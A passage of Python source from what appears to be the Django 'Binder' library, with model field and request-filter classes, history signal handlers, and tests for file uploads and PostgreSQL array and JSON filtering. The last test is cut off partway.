from django.utils.dateparse import parse_date, parse_datetime
from binder.json import jsonloads
from binder.exceptions import BinderRequestError
from . import history
class CaseInsensitiveCharField(CITextField):
    """Deprecated alias for ``django.contrib.postgres.fields.CITextField``.

    Kept for backwards compatibility only; warns on every instantiation.
    """
    def __init__(self, *args, **kwargs):
        # stacklevel=2 points the warning at the model declaring the field,
        # not at this wrapper.  Also: __init__ should not `return` a value.
        warnings.warn(
            'CaseInsensitiveCharField is deprecated, use django.contrib.postgres.fields.CITextField instead',
            DeprecationWarning,
            stacklevel=2,
        )
        super().__init__(*args, **kwargs)
class UpperCaseCharField(CITextField):
    """Case-insensitive text field whose values are stored upper-cased."""
    def get_prep_value(self, value):
        prepped = super().get_prep_value(value)
        return None if prepped is None else prepped.upper()
class LowerCaseCharField(CITextField):
    """Case-insensitive text field whose values are stored lower-cased."""
    def get_prep_value(self, value):
        prepped = super().get_prep_value(value)
        return None if prepped is None else prepped.lower()
class ChoiceEnum(object):
    """Enumeration of string choices for a ``CharField``.

    Positional arguments are choice values; an attribute name is derived for
    each by replacing ``[ /+-]`` with underscores and upper-casing (the empty
    string maps to ``NONE``).  Keyword arguments give explicit name/value
    pairs.  Each name is also exposed as an attribute on the instance.
    """
    def __init__(self, *args, **kwargs):
        self.items = kwargs
        for k in args:
            if k == '':
                self.items['NONE'] = ''
            else:
                self.items[re.sub('[ /+-]', '_', k).upper()] = k
        # Expose each choice as an attribute, e.g. enum.FOO_BAR == 'foo bar'.
        self.__dict__.update(self.items)

    def choices(self):
        """Return (value, name) tuples sorted by value, for CharField(choices=...)."""
        return tuple(sorted((v, k) for k, v in self.items.items()))

    def name(self, value, default=None):
        """Return the symbolic name for ``value``; ``default`` when value is None.

        Raises:
            ValueError: when the value is not a member of this enum.
        """
        if value is None:
            return default
        for k, v in self.items.items():
            if v == value:
                return k
        # BUG FIX: previously raised a bare ValueError() with no message.
        raise ValueError('Value {!r} is not a member of this ChoiceEnum'.format(value))

    def __call__(self, **kwargs):
        """Build a CharField with these choices; max_length fits the longest value."""
        return models.CharField(
            choices=self.choices(),
            max_length=max(map(len, self.items.values())),
            **kwargs
        )
class FieldFilter(object):
    """Base class for request-parameter filters on a single model field.

    Subclasses declare which model field classes they handle (``fields``),
    which lookup qualifiers are allowed (``allowed_qualifiers``), and how a
    raw string is parsed (``clean_value``).
    """
    # The classes that this filter applies to (should be mutually
    # exclusive with the other classes)
    fields = []
    # The list of allowed qualifiers
    allowed_qualifiers = []

    def __init__(self, field):
        self.field = field

    def field_description(self):
        """Return a human-readable description of the field for error messages."""
        return '{} {{{}}}.{{{}}}'.format(self.field.__class__.__name__, self.field.model.__name__, self.field.name)

    def clean_value(self, qualifier, v):
        """Parse a raw string into the field's Python type; must be overridden.

        BUG FIX: this used ``self.__class__.name`` (a nonexistent attribute),
        which raised AttributeError instead of the intended ValueError.
        """
        raise ValueError('FieldFilter {} has not overridden the clean_value method'.format(self.__class__.__name__))

    def check_qualifier(self, qualifier):
        """Raise BinderRequestError when ``qualifier`` is not allowed for this filter."""
        if qualifier not in self.allowed_qualifiers:
            raise BinderRequestError('Qualifier {} not supported for type {} ({}).'
                    .format(qualifier, self.__class__.__name__, self.field_description()))

    def get_q(self, qualifier, value, invert, partial=''):
        """Build a Q object for this field and qualifier from the raw value string."""
        self.check_qualifier(qualifier)
        # TODO: Try to make the splitting and cleaning more re-usable
        if qualifier in ('in', 'range'):
            values = value.split(',')
            if qualifier == 'range':
                if len(values) != 2:
                    raise BinderRequestError('Range requires exactly 2 values for {}.'.format(self.field_description()))
        else:
            values = [value]

        if qualifier == 'isnull':
            cleaned_value = True
        elif qualifier in ('in', 'range'):
            cleaned_value = [self.clean_value(qualifier, v) for v in values]
        else:
            try:
                cleaned_value = self.clean_value(qualifier, values[0])
            except IndexError:
                raise ValidationError('Value for filter {{{}}}.{{{}}} may not be empty.'.format(self.field.model.__name__, self.field.name))

        suffix = '__' + qualifier if qualifier else ''
        if invert:
            return ~Q(**{partial + self.field.name + suffix: cleaned_value})
        else:
            return Q(**{partial + self.field.name + suffix: cleaned_value})
class IntegerFieldFilter(FieldFilter):
    """Filter for integer-typed fields, including relations filtered by id."""
    fields = [
        models.IntegerField,
        models.ForeignKey,
        models.AutoField,
        models.ManyToOneRel,
        models.ManyToManyField,
        models.ManyToManyRel,
    ]
    allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']

    def clean_value(self, qualifier, v):
        """Parse ``v`` as an int, mapping parse failures to ValidationError."""
        try:
            parsed = int(v)
        except ValueError:
            raise ValidationError('Invalid value {{{}}} for {}.'.format(v, self.field_description()))
        return parsed
class FloatFieldFilter(FieldFilter):
    """Filter for float-typed fields."""
    fields = [models.FloatField]
    allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']

    def clean_value(self, qualifier, v):
        """Parse ``v`` as a float, mapping parse failures to ValidationError."""
        try:
            parsed = float(v)
        except ValueError:
            raise ValidationError('Invalid value {{{}}} for {}.'.format(v, self.field_description()))
        return parsed
class DateFieldFilter(FieldFilter):
    """Filter for DateField; accepts ISO ``YYYY-MM-DD`` values only."""
    fields = [models.DateField]
    # Maybe allow __startswith? And __year etc?
    allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']

    def clean_value(self, qualifier, v):
        """Parse a YYYY-MM-DD string into a date; raise ValidationError otherwise.

        BUG FIX: removed an unreachable trailing ``return v`` (both branches
        of the original if/else already exited).
        """
        if not re.match('^[0-9]{4}-[0-9]{2}-[0-9]{2}$', v):
            raise ValidationError('Invalid YYYY-MM-DD value {{{}}} for {}.'.format(v, self.field_description()))
        return parse_date(v)
class DateTimeFieldFilter(FieldFilter):
    """Filter for DateTimeField; accepts full ISO datetimes (zone required) or bare dates."""
    fields = [models.DateTimeField]
    # Maybe allow __startswith? And __year etc?
    allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']

    def clean_value(self, qualifier, v):
        """Parse ``v`` into a datetime (with zone) or a date.

        BUG FIX: removed an unreachable trailing ``return v`` (every branch
        already returned or raised).
        """
        if re.match('^[0-9]{4}-[0-9]{2}-[0-9]{2}[T ][0-9]{2}:[0-9]{2}:[0-9]{2}([.][0-9]+)?([A-Za-z]+|[+-][0-9]{1,4})$', v):
            return parse_datetime(v)
        if re.match('^[0-9]{4}-[0-9]{2}-[0-9]{2}$', v):
            return parse_date(v)
        raise ValidationError('Invalid YYYY-MM-DD(.mmm)ZONE value {{{}}} for {}.'.format(v, self.field_description()))

    def get_q(self, qualifier, value, invert, partial=''):
        """Like FieldFilter.get_q, but date-only values filter via the ``__date`` lookup."""
        self.check_qualifier(qualifier)
        # TODO: Try to make the splitting and cleaning more re-usable
        if qualifier in ('in', 'range'):
            values = value.split(',')
            if qualifier == 'range':
                if len(values) != 2:
                    raise BinderRequestError('Range requires exactly 2 values for {}.'.format(self.field_description()))
        else:
            values = [value]

        if qualifier == 'isnull':
            cleaned_value = True
        elif qualifier in ('in', 'range'):
            cleaned_value = [self.clean_value(qualifier, v) for v in values]
            # Mixing bare dates and full datetimes in one lookup is rejected.
            types = {type(v) for v in cleaned_value}
            if len(types) != 1:
                raise ValidationError('Values for filter {{{}}}.{{{}}} must be the same types.'.format(self.field.model.__name__, self.field.name))
            if isinstance(cleaned_value[0], date) and not isinstance(cleaned_value[0], datetime):
                qualifier = 'date__' + qualifier
        else:
            try:
                cleaned_value = self.clean_value(qualifier, values[0])
                if isinstance(cleaned_value, date) and not isinstance(cleaned_value, datetime):
                    qualifier = 'date__' + qualifier if qualifier else 'date'
            except IndexError:
                raise ValidationError('Value for filter {{{}}}.{{{}}} may not be empty.'.format(self.field.model.__name__, self.field.name))

        suffix = '__' + qualifier if qualifier else ''
        if invert:
            return ~Q(**{partial + self.field.name + suffix: cleaned_value})
        else:
            return Q(**{partial + self.field.name + suffix: cleaned_value})
class TimeFieldFilter(FieldFilter):
    """Filter for TimeField; accepts ``HH:MM:SS[.ffffff]`` with a mandatory zone."""
    fields = [models.TimeField]
    # Maybe allow __startswith? And __year etc?
    allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']
    time_re = re.compile(r'^(\d{2}):(\d{2}):(\d{2})(?:\.(\d+))?(Z|[+-]\d{2}(?:\d{2})?)$')

    def clean_value(self, qualifier, v):
        """Parse ``v`` into a zone-aware ``time``; raise ValidationError on bad input."""
        match = self.time_re.match(v)
        if match is None:
            raise ValidationError('Invalid HH:MM:SS(.mmm) value {{{}}} for {}.'.format(v, self.field_description()))

        hh, mm, ss, fraction, zone = match.groups()
        # Fractions shorter than six digits are right-padded to microseconds.
        micros = int((fraction or '').ljust(6, '0'))

        if zone == 'Z':
            tz = timezone.utc
        else:
            # A bare "+HH" offset is treated as "+HH00".
            zone = zone.ljust(5, '0')
            minutes = int(zone[1:3]) * 60 + int(zone[3:5])
            if zone.startswith('-'):
                minutes = -minutes
            tz = timezone.get_fixed_timezone(minutes)

        return time(
            hour=int(hh),
            minute=int(mm),
            second=int(ss),
            microsecond=micros,
            tzinfo=tz,
        )
class BooleanFieldFilter(FieldFilter):
    """Filter for BooleanField; only the literal strings 'true'/'false' are accepted."""
    fields = [models.BooleanField]
    allowed_qualifiers = [None]

    def clean_value(self, qualifier, v):
        """Map 'true'/'false' to bools; anything else is a ValidationError."""
        if v == 'true':
            return True
        if v == 'false':
            return False
        raise ValidationError('Invalid value {{{}}} for {}.'.format(v, self.field_description()))
class TextFieldFilter(FieldFilter):
    """Filter for text-typed fields; raw values are passed through unchanged."""
    fields = [models.CharField, models.TextField]
    allowed_qualifiers = [None, 'in', 'iexact', 'contains', 'icontains', 'startswith', 'istartswith', 'endswith', 'iendswith', 'exact', 'isnull']

    def clean_value(self, qualifier, v):
        # Any string is a valid text value, so no parsing is needed.
        return v
class UUIDFieldFilter(FieldFilter):
    """Filter for UUIDField; values are passed through as raw strings."""
    fields = [models.UUIDField]
    allowed_qualifiers = [None, 'in', 'iexact', 'contains', 'icontains', 'startswith', 'istartswith', 'endswith', 'iendswith', 'exact']

    def clean_value(self, qualifier, v):
        # Any string is accepted: with "contains" etc. the value does not
        # need to be a fully-formatted UUID.
        return v
class ArrayFieldFilter(FieldFilter):
    """Filter for postgres ArrayField; element parsing delegates to the base field's filter."""
    fields = [ArrayField]
    allowed_qualifiers = [None, 'contains', 'contained_by', 'overlap', 'isnull']

    # Some copy/pasta involved....
    def get_field_filter(self, field_class, reset=False):
        """Locate (and cache) the FieldFilter subclass that handles ``field_class``."""
        cached = None if reset else getattr(self, '_field_filter', None)
        if cached:
            return cached

        found = None
        for filter_cls in FieldFilter.__subclasses__():
            # NOTE: as in the original, a later subclass listing the same
            # field class wins over an earlier one.
            if any(field_cls == field_class for field_cls in filter_cls.fields):
                found = filter_cls
        self._field_filter = found
        return found

    def clean_value(self, qualifier, v):
        """Split ``v`` on commas and clean each element with the base field's filter."""
        element_filter_cls = self.get_field_filter(self.field.base_field.__class__)
        element_filter = element_filter_cls(self.field.base_field)
        # Special case: '' represents the empty array, not [''].
        if v == '':
            return []
        return [element_filter.clean_value(qualifier, item) for item in v.split(',')]
class JSONFieldFilter(FieldFilter):
    """Filter for postgres JSONField."""
    fields = [JSONField]
    # TODO: Element or path-based lookup is not supported yet
    allowed_qualifiers = [None, 'contains', 'contained_by', 'has_key', 'has_any_keys', 'has_keys', 'isnull']

    def clean_value(self, qualifier, v):
        """Parse the raw value according to the qualifier's expected shape."""
        if qualifier == 'has_key':
            # A single key: commas are part of the key, not separators.
            return v
        if qualifier in ('has_keys', 'has_any_keys'):
            # Comma-separated list of keys; '' means no keys at all.
            return v.split(',') if v != '' else []
        # Use bytes to allow decode() to work.  We don't just json.loads
        # because we want to behave identically to any other Binder JSON
        # decode when there are errors.
        return jsonloads(bytes(v, 'utf-8'))
class BinderModelBase(models.base.ModelBase):
    """Model metaclass that warns when a subclass's Meta does not extend BinderModel.Meta."""

    def __new__(cls, name, bases, attrs):
        # Verify that any Foo(BinderModel).Meta descends from BinderModel.Meta. Django messes
        # around with Meta a lot in its metaclass, to the point where we can no longer check this.
        # So we have to inject our own metaclass.__new__ to find this. See #96
        # Bonus points: this way we throw all these warnings at startup.
        # NameError: happens when name='BinderModel' -> ignore
        # KeyError: happens when Foo doesn't declare Meta -> ignore
        with suppress(NameError, KeyError):
            if not issubclass(attrs['Meta'], BinderModel.Meta):
                warnings.warn(RuntimeWarning('{}.{}.Meta does not descend from BinderModel.Meta'.format(attrs.get('__module__'), name)))
        return super().__new__(cls, name, bases, attrs)
class BinderModel(models.Model, metaclass=BinderModelBase):
    """Abstract base model with serialization helpers and strict save-time validation."""

    def binder_concrete_fields_as_dict(self, skip_deferred_fields=False):
        """Return {field name: value} for all concrete, non-m2m fields.

        FK values are the raw ids (no related-object DB query); file fields
        are stringified.  Deferred fields are skipped when
        ``skip_deferred_fields`` is True.
        """
        fields = {}
        deferred_fields = self.get_deferred_fields()

        for field in [f for f in self._meta.get_fields() if f.concrete and not f.many_to_many]:
            if skip_deferred_fields and field.attname in deferred_fields:
                continue
            elif isinstance(field, models.ForeignKey):
                fields[field.name] = getattr(self, field.name + '_id')
            elif isinstance(field, models.FileField):
                fields[field.name] = str(getattr(self, field.name))
            else:
                fields[field.name] = getattr(self, field.name)

        return fields

    def binder_serialize_m2m_field(self, field):
        """Serialize an m2m field into a set suitable for change comparison."""
        if isinstance(field, str):
            field = getattr(self, field)

        try:
            extended_m2m = field.through.binder_is_binder_model
        except AttributeError:
            extended_m2m = False

        # Regular many to many; get a list of the target ids.
        if not extended_m2m:
            return set(field.values_list('id', flat=True))

        # Extended m2m; get dicts of the intermediary join table objects
        data = list(field.through.objects.filter(**{field.source_field.name: self.id}).values())
        # Then, modify them to leave out the PKs and source ids. Also, rename target ids to 'id'.
        for d in data:
            d.pop('id')
            d.pop(field.source_field.name + '_id')
            d['id'] = d.pop(field.target_field.name + '_id')
        # BUG FIX: sorted() returns a list, which is unhashable, so building a
        # set of them raised TypeError; wrap each in a tuple instead.
        return set(tuple(sorted(d.items())) for d in data)

    binder_is_binder_model = True

    class Binder:
        # Set to True on a subclass to enable change-history tracking.
        history = False

    class Meta:
        abstract = True
        ordering = ['pk']

    def save(self, *args, **kwargs):
        self.full_clean()  # Never allow saving invalid models!
        return super().save(*args, **kwargs)

    # This can be overridden in your model when there are special
    # validation rules like partial indexes that may need to be
    # recomputed when other fields change.
    def field_requires_clean_validation(self, field):
        return self.field_changed(field)

    def full_clean(self, exclude=None, *args, **kwargs):
        """Validate the model, adding NOT NULL checks that Django's full_clean misses."""
        # Determine if the field needs an extra nullability check.
        # Expects the field object (not the field name)
        def field_needs_nullability_check(field):
            if isinstance(field, (models.CharField, models.TextField, models.BooleanField)):
                if field.blank and not field.null:
                    return True
            return False

        # Gather unchanged fields if LoadedValues mixin available, to
        # avoid querying uniqueness constraints for unchanged
        # relations (an useful performance optimization).
        if hasattr(self, 'field_changed'):
            exclude = set(exclude) if exclude else set()
            for f in self.binder_concrete_fields_as_dict(skip_deferred_fields=True):
                if not self.field_requires_clean_validation(f):
                    exclude.add(f)

        validation_errors = defaultdict(list)

        try:
            res = super().full_clean(exclude=exclude, *args, **kwargs)
        except ValidationError as ve:
            if hasattr(ve, 'error_dict'):
                for key, value in ve.error_dict.items():
                    validation_errors[key] += value
            elif hasattr(ve, 'error_list'):
                for e in ve.error_list:
                    validation_errors['null'].append(e)  # XXX

        # Django's standard full_clean() doesn't complain about some
        # not-NULL fields being None. This causes save() to explode
        # with a django.db.IntegrityError because the column is NOT
        # NULL. Tyvm, Django. So we perform an extra NULL check for
        # some cases. See #66, T2989, T9646.
        for f in self._meta.fields:
            if field_needs_nullability_check(f):
                # gettattr on a foreignkey foo gets the related model, while foo_id just gets the id.
                # We don't need or want the model (nor the DB query), we'll take the id thankyouverymuch.
                name = f.name + ('_id' if isinstance(f, models.ForeignKey) else '')
                # NOTE(review): the second getattr uses f.name, which for FKs
                # does fetch the related object despite the comment above —
                # confirm whether the double check is intentional.
                if getattr(self, name) is None and getattr(self, f.name) is None:
                    validation_errors[f.name].append(ValidationError(
                        'This field cannot be null.',
                        code='null',
                    ))

        if validation_errors:
            raise ValidationError(validation_errors)
        else:
            return res
def history_obj_post_init(sender, instance, **kwargs):
    """post_init handler: snapshot concrete field values for change detection."""
    snapshot = instance.binder_concrete_fields_as_dict(skip_deferred_fields=True)
    if not instance.pk:
        # Unsaved instance: every field counts as "new" rather than a value.
        snapshot = dict.fromkeys(snapshot, history.NewInstanceField)
    instance._history = snapshot
def history_obj_post_save(sender, instance, **kwargs):
    """post_save handler: record changed fields and refresh the snapshot.

    FIX: the KeyError guard now wraps only the snapshot lookup; previously a
    KeyError raised inside history.change() would also be silently swallowed.
    """
    for field_name, new_value in instance.binder_concrete_fields_as_dict().items():
        try:
            old_value = instance._history[field_name]
        except KeyError:
            # Unfetched field (using only(...)), we don't know if it's
            # been changed...
            continue
        if old_value != new_value:
            history.change(sender, instance.pk, field_name, old_value, new_value)
        instance._history[field_name] = new_value
def history_obj_post_delete(sender, instance, **kwargs):
    """post_delete handler: record the deletion as the pk going to None."""
    pk = instance.pk
    history.change(sender, pk, 'pk', pk, None)
def history_obj_m2m_changed(sender, instance, action, reverse, model, pk_set, **kwargs):
    """m2m_changed handler: flag the m2m field as changed (value resolved lazily)."""
    # Only the forward "pre_" actions are of interest.
    if reverse or action not in ('pre_add', 'pre_remove', 'pre_clear'):
        return
    # Find the corresponding field on the instance
    matches = [
        f for f in instance._meta.get_fields()
        if f.concrete and f.many_to_many and f.remote_field.through == sender
    ]
    field = matches[0]
    history.change(instance.__class__, instance.id, field.name, history.DeferredM2M, history.DeferredM2M)
# FIXME: remove
def install_m2m_signal_handlers(model):
    """Deprecated alias for install_history_signal_handlers()."""
    # stacklevel=2 points the warning at the caller rather than this wrapper.
    warnings.warn(
        'install_m2m_signal_handlers() is deprecated, call install_history_signal_handlers() instead!',
        DeprecationWarning,
        stacklevel=2,
    )
    install_history_signal_handlers(model)
def install_history_signal_handlers(model):
    """Recursively connect history signal handlers for ``model`` and its subclasses."""
    if model is None:
        return

    # Only concrete models that opted in via Binder.history get handlers.
    if not model.Meta.abstract and model.Binder.history:
        for signal, handler in (
            (signals.post_init, history_obj_post_init),
            (signals.post_save, history_obj_post_save),
            (signals.post_delete, history_obj_post_delete),
        ):
            signal.connect(handler, model)
        for field in model._meta.get_fields():
            if field.many_to_many and field.concrete:
                signals.m2m_changed.connect(history_obj_m2m_changed, getattr(model, field.name).through)

    for sub in model.__subclasses__():
        install_history_signal_handlers(sub)
class ContextAnnotation:
    """Wraps a callable so an annotation expression can depend on the request."""

    def __init__(self, func):
        self._func = func

    def get(self, request):
        """Evaluate the wrapped callable against ``request``."""
        return self._func(request)
class OptionalAnnotation:
    """Wraps an annotation expression that may itself be a ContextAnnotation."""

    def __init__(self, expr):
        self._expr = expr

    def get(self, request):
        """Resolve the expression, unwrapping a nested ContextAnnotation if present."""
        expr = self._expr
        if isinstance(expr, ContextAnnotation):
            return expr.get(request)
        return expr
--- FILE SEPARATOR ---
import json
from os import urandom
from PIL import Image
from tempfile import NamedTemporaryFile
from django.test import TestCase, Client
import mimetypes
from binder.json import jsonloads
from django.core.files import File
from django.contrib.auth.models import User
from .testapp.models import Animal, Zoo
def image(width, height):
    """Return a PIL RGB image of the given size filled with random pixel data."""
    raw = urandom(width * height * 3)
    return Image.frombytes('RGB', (width, height), raw)
# Maps a PIL image format name to the filename suffix used for temp files.
IMG_SUFFIX = {
    'jpeg': '.jpg',
    'png': '.png',
}
def temp_imagefile(width, height, format):
    """Create a NamedTemporaryFile holding a random image, rewound to the start."""
    tmp = NamedTemporaryFile(suffix=IMG_SUFFIX[format])
    image(width, height).save(tmp, format)
    tmp.seek(0)
    return tmp
class FileUploadTest(TestCase):
    """End-to-end tests for uploading and serving model file fields."""

    def setUp(self):
        # Log in as a superuser so permission checks never interfere.
        super().setUp()
        u = User(username='testuser', is_active=True, is_superuser=True)
        u.set_password('test')
        u.save()
        self.client = Client()
        r = self.client.login(username='testuser', password='test')
        self.assertTrue(r)

    # Clean up uploaded files
    def tearDown(self):
        Zoo.objects.all().delete()

    def test_get_model_with_file(self):
        """GET on a model with a stored file returns the file's download URL."""
        emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
        with temp_imagefile(100, 200, 'jpeg') as file:
            emmen.floor_plan.save('plan.jpg', File(file), save=False)
            emmen.save()
        response = self.client.get('/zoo/%d/' % emmen.id)
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(emmen.id, result['data']['id'])
        # NOTE(review): the third argument to assertEqual is the failure
        # *message*, not another value to compare — confirm whether a literal
        # name check was intended here.
        self.assertEqual(emmen.name, result['data']['name'], 'Wildlands Adventure Zoo Emmen')
        self.assertEqual('/zoo/%d/floor_plan/' % emmen.id, result['data']['floor_plan'])

    # This is a basic regression test for a bug due to the router
    # singleton refactor, GET would crash if the model simply
    # _contained_ a file attribute.
    def test_get_related_model_with_file(self):
        """GET with a related model that has a file field must not crash."""
        emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
        with temp_imagefile(100, 200, 'jpeg') as file:
            emmen.floor_plan.save('plan.jpg', File(file), save=False)
            emmen.save()
        donald = Animal(name='Donald Duck', zoo=emmen)
        donald.save()
        response = self.client.get('/animal/%d/' % donald.id, data={'with': 'zoo'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(donald.id, result['data']['id'])
        self.assertEqual({'zoo': 'zoo'}, result['with_mapping'])
        self.assertEqual({'zoo': 'animals'}, result['with_related_name_mapping'])
        zoo = result['with']['zoo'][0]
        self.assertEqual(emmen.id, zoo['id'])
        # NOTE(review): third assertEqual argument is a message — see note above.
        self.assertEqual(emmen.name, zoo['name'], 'Wildlands Adventure Zoo Emmen')
        self.assertEqual('/zoo/%d/floor_plan/' % emmen.id, zoo['floor_plan'])

    # Same as above, but in multi-put's code path
    def test_multi_put_model_with_existing_file(self):
        """Multi-PUT on a model that already has a stored file must succeed."""
        emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
        with temp_imagefile(100, 200, 'jpeg') as file:
            emmen.floor_plan.save('plan.jpg', File(file), save=False)
            emmen.save()
        model_data = {
            'data': [{
                'id': emmen.id,
                'name': 'Wildlands!',
            }]
        }
        response = self.client.put('/zoo/', data=json.dumps(model_data), content_type='application/json')
        self.assertEqual(response.status_code, 200)

    def test_upload_to_file_field_stores_file(self):
        """POSTing a file stores it; a second POST overwrites the stored file."""
        emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
        emmen.save()
        with temp_imagefile(100, 200, 'jpeg') as uploaded_file:
            response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': uploaded_file})
            self.assertEqual(response.status_code, 200)
            emmen.refresh_from_db()
            uploaded_file.seek(0)
            self.assertTrue(emmen.floor_plan)
            with emmen.floor_plan.file as current_file:
                self.assertEqual(uploaded_file.read(), current_file.read())
        # overwrite with new one
        with temp_imagefile(10, 20, 'jpeg') as replacement_file:
            response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': replacement_file})
            self.assertEqual(response.status_code, 200)
            emmen.refresh_from_db()
            replacement_file.seek(0)
            self.assertTrue(emmen.floor_plan)
            with emmen.floor_plan.file as current_file:
                self.assertEqual(replacement_file.read(), current_file.read())

    def test_upload_triggers_file_field_validation_errors(self):
        """An upload that fails model validation returns 400 with per-field errors."""
        emmen = Zoo(name='Nowhere')
        emmen.save()
        with temp_imagefile(100, 200, 'jpeg') as uploaded_file:
            response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': uploaded_file})
            self.assertEqual(response.status_code, 400)
            returned_data = jsonloads(response.content)
            self.assertEqual(len(returned_data['errors']), 1)
            self.assertEqual(len(returned_data['errors']['zoo']), 1)
            self.assertSetEqual(set(['floor_plan', 'name']), set(returned_data['errors']['zoo'][str(emmen.id)].keys()))
            self.assertEqual('no plan', returned_data['errors']['zoo'][str(emmen.id)]['floor_plan'][0]['code'])
            self.assertEqual('nowhere', returned_data['errors']['zoo'][str(emmen.id)]['name'][0]['code'])
            # The failed upload must not leave a file behind.
            emmen.refresh_from_db()
            self.assertFalse(emmen.floor_plan)

    def test_upload_size_resized_png(self):
        """Oversized PNG uploads are stored as 500x500 JPEG."""
        emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
        emmen.save()
        with temp_imagefile(600, 600, 'png') as uploaded_file:
            response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': uploaded_file})
            self.assertEqual(response.status_code, 200)
            emmen.refresh_from_db()
            content_type = mimetypes.guess_type(emmen.floor_plan.path)[0]
            self.assertEqual(content_type, 'image/jpeg')
            self.assertEqual(emmen.floor_plan.width, 500)
            self.assertEqual(emmen.floor_plan.height, 500)

    def test_upload_size_resized_jpeg(self):
        """Oversized JPEG uploads are resized to 500x500."""
        emmen = Zoo(name='Wildlands Adventure Zoo Emmen')
        emmen.save()
        with temp_imagefile(600, 600, 'jpeg') as uploaded_file:
            response = self.client.post('/zoo/%s/floor_plan/' % emmen.id, data={'file': uploaded_file})
            self.assertEqual(response.status_code, 200)
            emmen.refresh_from_db()
            content_type = mimetypes.guess_type(emmen.floor_plan.path)[0]
            self.assertEqual(content_type, 'image/jpeg')
            self.assertEqual(emmen.floor_plan.width, 500)
            self.assertEqual(emmen.floor_plan.height, 500)
--- FILE SEPARATOR ---
import os
import unittest
from django.test import TestCase, Client
from binder.json import jsonloads
from django.contrib.auth.models import User
# These models use postgres-specific fields (ArrayField/JSONField), so skip
# importing them when the test run targets MySQL.
if os.environ.get('BINDER_TEST_MYSQL', '0') == '0':
    from .testapp.models import FeedingSchedule, Animal, Zoo
# TODO: Currently these only really test filtering. Move to test/filters?
@unittest.skipIf(
os.environ.get('BINDER_TEST_MYSQL', '0') != '0',
"Only available with PostgreSQL"
)
class PostgresFieldsTest(TestCase):
    def setUp(self):
        """Create a logged-in superuser client plus two feeding schedules to filter on."""
        super().setUp()
        u = User(username='testuser', is_active=True, is_superuser=True)
        u.set_password('test')
        u.save()
        self.client = Client()
        r = self.client.login(username='testuser', password='test')
        self.assertTrue(r)
        gaia = Zoo(name='GaiaZOO')
        gaia.save()
        coyote = Animal(name='Wile E. Coyote', zoo=gaia)
        coyote.save()
        roadrunner = Animal(name='Roadrunner', zoo=gaia)
        roadrunner.save()
        # Disjoint foods/schedule values so array and JSON filters can tell the two apart.
        self.coyote_feeding = FeedingSchedule(animal=coyote, foods=['meat'], schedule_details={'10:30': ['meat'], '16:00': ['meat']})
        self.coyote_feeding.save()
        self.rr_feeding = FeedingSchedule(animal=roadrunner, foods=['corn', 'bugs'], schedule_details={'10:30': ['corn'], '16:00': ['corn', 'bugs']})
        self.rr_feeding.save()
    def test_get_collection_arrayfield_exact_filtering(self):
        """A bare `.foods` filter matches only the exact array (all elements, no extras)."""
        response = self.client.get('/feeding_schedule/', data={'.foods': 'corn,bugs'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        # A strict subset of an existing array does not match.
        response = self.client.get('/feeding_schedule/', data={'.foods': 'corn'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        # Neither does a superset.
        response = self.client.get('/feeding_schedule/', data={'.foods': 'corn,bugs,meat'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        response = self.client.get('/feeding_schedule/', data={'.foods': 'meat'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.coyote_feeding.id, result['data'][0]['id'])
    def test_get_collection_jsonfield_exact_filtering(self):
        """A bare `.schedule_details` filter matches only the exact JSON document."""
        response = self.client.get('/feeding_schedule/', data={'.schedule_details': '{"10:30": ["meat"], "16:00": ["meat"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.coyote_feeding.id, result['data'][0]['id'])

        # A partial document does not match.
        response = self.client.get('/feeding_schedule/', data={'.schedule_details': '{"10:30": ["meat"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        response = self.client.get('/feeding_schedule/', data={'.schedule_details': '{"10:30": ["corn"], "16:00": ["corn", "bugs"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        # The empty document matches nothing.
        response = self.client.get('/feeding_schedule/', data={'.schedule_details': '{}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))
    def test_get_collection_arrayfield_overlap_filtering(self):
        """`:overlap` matches rows sharing at least one element; '' matches none."""
        response = self.client.get('/feeding_schedule/', data={'.foods:overlap': 'corn'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        response = self.client.get('/feeding_schedule/', data={'.foods:overlap': 'corn,meat'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(2, len(result['data']))

        # Unknown elements are simply ignored as long as one overlaps.
        response = self.client.get('/feeding_schedule/', data={'.foods:overlap': 'corn,bricks'})
        self.assertEqual(response.status_code, 200)
